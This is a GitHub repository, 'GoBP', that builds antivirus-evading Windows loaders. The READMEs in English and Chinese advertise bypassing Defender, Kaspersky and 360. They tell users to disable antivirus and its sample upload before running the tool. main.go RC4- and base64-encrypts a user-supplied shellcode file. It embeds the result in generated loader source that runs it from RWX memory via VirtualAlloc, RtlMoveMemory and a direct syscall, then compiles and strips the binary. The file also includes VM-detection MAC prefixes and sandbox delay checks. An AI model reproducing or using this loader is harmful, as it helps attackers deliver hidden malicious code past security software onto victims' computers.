├── go.mod
├── Tool
    └── go-strip.exe
├── images
    ├── Demo1.png
    ├── CNdemo1.png
    ├── CNdemo2.jpg
    └── payload.png
├── readme_zh-CN.md
├── README.md
└── main.go


/go.mod:
--------------------------------------------------------------------------------
1 | module GoBP
2 | 
3 | go 1.16
4 | 


--------------------------------------------------------------------------------
/Tool/go-strip.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/Tool/go-strip.exe


--------------------------------------------------------------------------------
/images/Demo1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/Demo1.png


--------------------------------------------------------------------------------
/images/CNdemo1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/CNdemo1.png


--------------------------------------------------------------------------------
/images/CNdemo2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/CNdemo2.jpg


--------------------------------------------------------------------------------
/images/payload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/payload.png


--------------------------------------------------------------------------------
/readme_zh-CN.md:
--------------------------------------------------------------------------------
 1 | [English](./readme.md)
 2 | 
 3 | # GoBP
 4 | 免杀工具 Go语言编写
 5 |  - 免杀生成工具
 6 |  - 语言：Golang
 7 |  - 平台：Windows
 8 |  - 目前免杀杀软
 9 |    - Windows defender
10 |    - 卡巴斯基
11 | 
12 | 
13 | # 使用方法
14 | 
15 | `
16 | git clone https://github.com/awsaaaq/GoBP.git
17 | `
18 | 
19 | 将payload.bin 放置在和 main.go同目录文件夹中
20 | 
21 | `
22 | go build main.go
23 | `
24 | 
25 | 执行main.exe
26 | ![image](images/mainexe.png)
27 | 
28 | 生成一个GoBP.exe
29 | Generate an execute GoBP.exe
30 | 
31 | ![image](/images/payload.png)
32 | 
33 | # 注意事项
34 | 在执行main.exe前关闭杀软！
35 | 
36 | 关闭杀软自动上传功能！
37 | 
38 | # 示例
39 | ## defender 免杀
40 | 
41 | ![image](/images/Demo1.png)
42 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | [中文](./readme_zh-CN.md)
 2 | # Update
 3 | Version 2.0
 4 | Just offer main.exe 
 5 | ## What's Update
 6 | - Random way to generate bypass antiviru payload
 7 | - Add antiSanbox
 8 | - Add antiVM
 9 | - Bypass Windows Defender
10 | - Bypass Kaspersky
11 | - Bypass 360 
12 | ...
13 | ## Notes
14 | Please **Turn off** Antivirus software before execute main.exe!
15 | 
16 | **Close** AntiVirus AutoUpload func!
17 | 
18 | ## Usages
19 | execute command as followed in current dir:
20 | 
21 | ```
22 | go get github.com/lxn/win
23 | go get golang.org/x/sys/windows
24 | ```
25 | 
26 | Put payload.bin in main.exe's directory
27 | 
28 | Execute main.exe
29 | 
30 | Generate an execute GoBP.exe and Gostrip.exe
31 | 
32 | 
33 | # GoBP
34 | An Bypass Antivirus Tool by Golang in windows
35 | 
36 | 
37 |  - Bypass Windows Defender
38 |  - Bypass Kaspersky
39 |  - Bypass 360 
40 |  - ...
41 | # Usages
42 | `
43 | git clone https://github.com/awsaaaq/GoBP.git
44 | `
45 | 
46 | 
47 | Put payload.bin in main.go's directory
48 | 
49 | 
50 | 
51 | `
52 | go build main.go
53 | `
54 | 
55 | Execute main.exe
56 | 
57 | Generate an execute GoBP.exe
58 | 
59 | ![image](/images/payload.png)
60 | 
61 | 
62 | 
63 | # Demo
64 | 
65 | ![image](/images/Demo1.png)
66 | 
67 | some China test result
68 | 
69 | ![image](/images/CNdemo1.png)
70 | 
71 | ![image](/images/CNdemo2.jpg)
72 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"crypto/rc4"
  6 | 	"encoding/base64"
  7 | 	"fmt"
  8 | 	"io"
  9 | 	"io/ioutil"
 10 | 	"math/rand"
 11 | 	"net"
 12 | 	"os"
 13 | 	"os/exec"
 14 | 	"strings"
 15 | 	"syscall"
 16 | 	"time"
 17 | 	"unsafe"
 18 | )
 19 | 
 20 | const Version = "1.1"
 21 | const Banner = `
 22 | 
 23 |   ____       ____  ____  
 24 |  / ___| ___ | __ )|  _ \ 
 25 | | |  _ / _ \|  _ \| |_) |
 26 | | |_| | (_) | |_) |  __/ 
 27 |  \____|\___/|____/|_|    
 28 | 
 29 | 					
 30 | Bypass by Go
 31 | Author:AntiFire
 32 | `
 33 | 
 34 | func ShowBanner() {
 35 | 
 36 | 	fmt.Printf(Banner)
 37 | 
 38 | }
 39 | 
 40 | func Delay() (int, error) {
 41 | 	startTime := time.Now()
 42 | 	time.Sleep(10 * time.Second)
 43 | 	endTime := time.Now()
 44 | 	sleepTime := endTime.Sub(startTime)
 45 | 	if sleepTime >= time.Duration(10*time.Second) {
 46 | 		return 1, nil
 47 | 	} else {
 48 | 		return 0, nil
 49 | 	}
 50 | }
 51 | 
 52 | var (
 53 | 	kernel32      = syscall.MustLoadDLL("kernel32.dll")
 54 | 	ntdll         = syscall.MustLoadDLL("ntdll.dll")
 55 | 	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
 56 | 	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
 57 | )
 58 | 
 59 | const (
 60 | 	MEM_COMMIT             = 0x1000
 61 | 	MEM_RESERVE            = 0x2000
 62 | 	PAGE_EXECUTE_READWRITE = 0x40
 63 | )
 64 | 
 65 | var macList = []string{"00:0c:29", "00:50:56", "08:00:27", "52:54:00 ", "00:21:F6", "00:14:4F", "00:0F:4B", "00:10:E0", "00:00:7D", "00:21:28", "00:01:5D", "00:21:F6", "00:A0:A4",
 66 | 	"00:07:82", "00:03:BA", "08:00:20", "2C:C2:60", "00:10:4F", "00:0F:4B", "00:13:97", "00:20:F2", "00:14:4F"}
 67 | 
 68 | func getMacAddr() []string {
 69 | 	ifas, _ := net.Interfaces()
 70 | 
 71 | 	var as []string
 72 | 	for _, ifa := range ifas {
 73 | 		a := ifa.HardwareAddr.String()
 74 | 		if a != "" {
 75 | 			as = append(as, a)
 76 | 		}
 77 | 	}
 78 | 	return as
 79 | }
 80 | 
 81 | func ByMacAddress() bool {
 82 | 	return ContainsPrefix(macList, getMacAddr()[0])
 83 | 
 84 | }
 85 | func ContainsPrefix(s []string, macAdress string) bool {
 86 | 	for _, v := range s {
 87 | 		return strings.HasPrefix(macAdress, v)
 88 | 	}
 89 | 
 90 | 	return false
 91 | }
 92 | func read(file string) []byte {
 93 | 	data, err := ioutil.ReadFile(file)
 94 | 	if err != nil {
 95 | 		fmt.Print(err)
 96 | 	}
 97 | 	return data
 98 | }
 99 | 
100 | func randomInt(min, max int) int {
101 | 	return min + rand.Intn(max-min)
102 | }
103 | 
104 | func genGoExe() {
105 | 	cmd := exec.Command("cmd.exe", "/c", `start go mod init main`)
106 | 	cmd.Dir = "GoBPTemp"
107 | 
108 | 	if err := cmd.Run(); err != nil {
109 | 		fmt.Println("No Go Env")
110 | 		return
111 | 	}
112 | 
113 | 	cmd2 := exec.Command("cmd.exe", "/c", "start", "go", "build", "-ldflags", "-s -w", "GOrun.go")
114 | 	var stderr2 bytes.Buffer
115 | 	cmd2.Stderr = &stderr2
116 | 	cmd2.Dir = "GoBPTemp"
117 | 	if err := cmd2.Run(); err != nil {
118 | 		fmt.Println(stderr2.String())
119 | 		return
120 | 	}
121 | 
122 | 	cmd3 := exec.Command("cmd.exe", "/c", "copy .\\GOrun.exe .\\..\\GoBP.exe && exit")
123 | 	var stderr3 bytes.Buffer
124 | 	cmd3.Stderr = &stderr3
125 | 	cmd3.Dir = "GoBPTemp"
126 | 	if err := cmd3.Run(); err != nil {
127 | 		fmt.Println(stderr3.String())
128 | 		return
129 | 	}
130 | 	os.RemoveAll("./GoBPTemp")
131 | 
132 | 	cmd_go_strip := exec.Command("cmd.exe", "/c", "go-strip.exe -f ..\\GoBP.exe -a -output ..\\GoBP.exe")
133 | 
134 | 	cmd_go_strip.Dir = "Tool"
135 | 	cmd_go_strip.Run()
136 | 	time.Sleep(5)
137 | 
138 | }
139 | func randomString(len int) string {
140 | 	rand.Seed(time.Now().UnixNano())
141 | 	bytes := make([]byte, len)
142 | 	for i := 0; i < len; i++ {
143 | 		bytes[i] = byte(randomInt(65, 90))
144 | 	}
145 | 	return string(bytes)
146 | }
147 | 
148 | var key string = randomString(5)
149 | 
150 | func enc(src string) string {
151 | 	shellcode := []byte(src)
152 | 	enc_shellcode := make([]byte, len(shellcode))
153 | 
154 | 	cipher1, _ := rc4.NewCipher([]byte(key))
155 | 	cipher1.XORKeyStream(enc_shellcode, shellcode)
156 | 
157 | 	base64Rc4_shellcode := base64.StdEncoding.EncodeToString(enc_shellcode)
158 | 	return base64Rc4_shellcode
159 | 
160 | }
161 | 
162 | func runshellcode(charcode []byte) {
163 | 	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
164 | 	if addr == 0 {
165 | 		fmt.Println("Can't call VirtualAlloc")
166 | 		fmt.Println(err.Error())
167 | 		os.Exit(1)
168 | 
169 | 	}
170 | 
171 | 	_, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
172 | 
173 | 	for j := 0; j < len(charcode); j++ {
174 | 		charcode[j] = 0
175 | 	}
176 | 
177 | 	syscall.Syscall(addr, 0, 0, 0, 0)
178 | 
179 | }
180 | 
181 | func dec(src string) []byte {
182 | 	debase64_data, _ := base64.StdEncoding.DecodeString(src)
183 | 
184 | 	dec_shellcode := make([]byte, len(debase64_data))
185 | 	cipher2, _ := rc4.NewCipher([]byte(key))
186 | 	cipher2.XORKeyStream(dec_shellcode, debase64_data)
187 | 	return dec_shellcode
188 | 
189 | }
190 | 
191 | var Gocode1 = `
192 | package main
193 | 
194 | import (
195 | 	"crypto/rc4"
196 | 	"encoding/base64"
197 | 	"syscall"
198 | 	"unsafe"
199 | )
200 | 
201 | var (
202 | 	kernel32      = syscall.MustLoadDLL("kernel32.dll")
203 | 	ntdll         = syscall.MustLoadDLL("ntdll.dll")
204 | 	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
205 | 	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
206 | )
207 | 
208 | const (
209 | 	MEM_COMMIT             = 0x1000
210 | 	MEM_RESERVE            = 0x2000
211 | 	PAGE_EXECUTE_READWRITE = 0x40
212 | )
213 | 
214 | 
215 | func runshellcode(charcode []byte) {
216 | 	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
217 | 	
218 | 	
219 | 
220 | 	//Delay()
221 | 	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
222 | 
223 | 	for j := 0; j < len(charcode); j++ {
224 | 		charcode[j] = 0
225 | 	}
226 | 	//Delay()
227 | 
228 | 	syscall.Syscall(addr, 0, 0, 0, 0)
229 | }
230 | 
231 | func dec(src string) []byte {
232 | 	debase64_data, _ := base64.StdEncoding.DecodeString(src)
233 | 
234 | 	dec_shellcode := make([]byte, len(debase64_data))
235 | 	cipher2, _ := rc4.NewCipher([]byte(key)) 
236 | 	cipher2.XORKeyStream(dec_shellcode, debase64_data)
237 | 	return dec_shellcode
238 | 	
239 | 
240 | }
241 | 
242 | 
243 | 
244 | 	var enc_data = "`
245 | 
246 | var codeKey = `"
247 | 	var key string = "`
248 | 
249 | var Gocode2 = `"
250 | 
251 | func main() {
252 | 	shellcodefin := dec(enc_data)
253 | 	runshellcode(shellcodefin)
254 | }
255 | `
256 | 
257 | func main() {
258 | 	ShowBanner()
259 | 	enc_data := enc(string(read("./payload.bin")))
260 | 	codeText := Gocode1 + enc_data + codeKey + key + Gocode2
261 | 
262 | 	//fmt.Print(codeText)
263 | 	os.Mkdir("GoBPTemp", 0777)
264 | 	f, err := os.OpenFile("GoBPTemp/GOrun.go", os.O_WRONLY|os.O_CREATE, 0600)
265 | 
266 | 	if err != nil {
267 | 		fmt.Print("Create folder failed")
268 | 	}
269 | 	defer f.Close()
270 | 	io.WriteString(f, codeText)
271 | 	f.Close()
272 | 	// Generate Go payload
273 | 	genGoExe()
274 | 	fmt.Print("GoBP Generate!")
275 | 
276 | }
277 | 


--------------------------------------------------------------------------------